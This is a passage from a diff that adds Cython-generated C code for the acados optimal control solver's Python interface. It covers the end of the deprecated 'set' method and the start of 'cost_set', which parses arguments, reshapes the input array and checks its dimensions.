+ */ + __pyx_t_12 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_12) && PyErr_Occurred())) __PYX_ERR(0, 539, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 539, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":538 + * + * if field_ in constraints_fields: + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: + */ + (void)(ocp_nlp_constraints_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_12, ((void *)__pyx_t_8))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":537 + * raise Exception(msg) + * + * if field_ in constraints_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + goto __pyx_L6; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":540 + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_cost_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 540, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":542 + * elif field_ in cost_fields: + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) # <<<<<<<<<<<<<< + * elif field_ in out_fields: + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + */ + __pyx_t_13 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_13) && PyErr_Occurred())) __PYX_ERR(0, 542, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 542, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":541 + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: + */ + (void)(ocp_nlp_cost_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_13, ((void *)__pyx_t_8))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":540 + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + goto __pyx_L6; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":543 + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_out_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 543, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":545 + * elif field_ in out_fields: + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) # <<<<<<<<<<<<<< + * elif field_ in mem_fields: + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + */ + __pyx_t_14 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_14) && PyErr_Occurred())) __PYX_ERR(0, 545, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 545, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":544 + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: + */ + ocp_nlp_out_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_14, ((void *)__pyx_t_8)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":543 + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + */ + goto __pyx_L6; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":546 + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + * self.nlp_solver, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_mem_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":548 + * elif field_ in mem_fields: + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + * self.nlp_solver, stage, field, value.data) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_15 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_15) && PyErr_Occurred())) __PYX_ERR(0, 548, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 548, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":547 + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_solver, stage, field, value.data) + * + */ + ocp_nlp_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_v_stage, __pyx_t_15, ((void *)__pyx_t_8)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":546 + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + * self.nlp_solver, stage, field, value.data) + */ + } + __pyx_L6:; + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_value.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_value.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF(__pyx_v_cost_fields); + __Pyx_XDECREF(__pyx_v_constraints_fields); + __Pyx_XDECREF(__pyx_v_out_fields); + __Pyx_XDECREF(__pyx_v_mem_fields); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF((PyObject *)__pyx_v_value); + __Pyx_XDECREF(__pyx_v_dims); + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set, "\n Set numerical data in the cost module of the solver.\n\n :param stage: integer corresponding to shooting node\n :param field: string, e.g. 'yref', 'W', 'ext_cost_num_hess'\n :param value: of appropriate size\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set = {"cost_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("cost_set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("cost_set", 1, 3, 3, 1); __PYX_ERR(0, 551, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("cost_set", 1, 3, 3, 2); __PYX_ERR(0, 551, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "cost_set") < 0)) __PYX_ERR(0, 551, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + __pyx_v_value_ = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("cost_set", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 551, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.cost_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 551, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims[2]; + __Pyx_memviewslice __pyx_v_value = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_v_value_shape = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + char const *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + __Pyx_memviewslice __pyx_t_9 = { 0, 0, { 0 }, { 0 }, { 0 } }; + int __pyx_t_10; + Py_UCS4 __pyx_t_11; + char const *__pyx_t_12; + Py_ssize_t __pyx_t_13; + Py_ssize_t __pyx_t_14; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("cost_set", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":559 + * :param value: of appropriate size + * """ + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef int dims[2] + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 559, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 559, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":563 + * cdef int dims[2] + * acados_solver_common.ocp_nlp_cost_dims_get_from_attr(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) # <<<<<<<<<<<<<< + * + * cdef double[::1,:] value + */ + __pyx_t_2 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_2) && PyErr_Occurred())) __PYX_ERR(0, 563, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":562 + * + * cdef int dims[2] + * acados_solver_common.ocp_nlp_cost_dims_get_from_attr(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) + * + */ + ocp_nlp_cost_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_2, (&(__pyx_v_dims[0]))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":567 + * cdef double[::1,:] value + * + * value_shape = value_.shape # <<<<<<<<<<<<<< + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 567, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_value_shape = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":568 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 568, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 1); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":569 + * value_shape = value_.shape + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) # <<<<<<<<<<<<<< + * value = np.asfortranarray(value_[None,:]) + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_int_0); + __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_value_shape, __pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":570 + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) # <<<<<<<<<<<<<< + * + * elif len(value_shape) == 2: + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_v_value_, __pyx_tuple__26); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_1}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":568 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":572 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 572, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 2); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":574 + * elif len(value_shape) == 2: + * # Get elements in column major order + * value = np.asfortranarray(value_) # <<<<<<<<<<<<<< + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_np); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_value_}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 574, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":572 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":576 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + __pyx_t_5 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[0])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = PyObject_RichCompare(__pyx_t_5, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (!__pyx_t_10) { + } else { + __pyx_t_4 = __pyx_t_10; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_6 = __Pyx_GetItemInt(__pyx_v_value_shape, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[1])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyObject_RichCompare(__pyx_t_6, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 576, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_4 = __pyx_t_10; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_4)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":578 + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') # <<<<<<<<<<<<<< + * + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, \ + */ + __pyx_t_5 = PyTuple_New(9); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_11 = 127; + __Pyx_INCREF(__pyx_kp_u_for_field); + __pyx_t_3 += 12; + __Pyx_GIVEREF(__pyx_kp_u_for_field); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_for_field); + __pyx_t_1 = __Pyx_PyUnicode_Unicode(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + 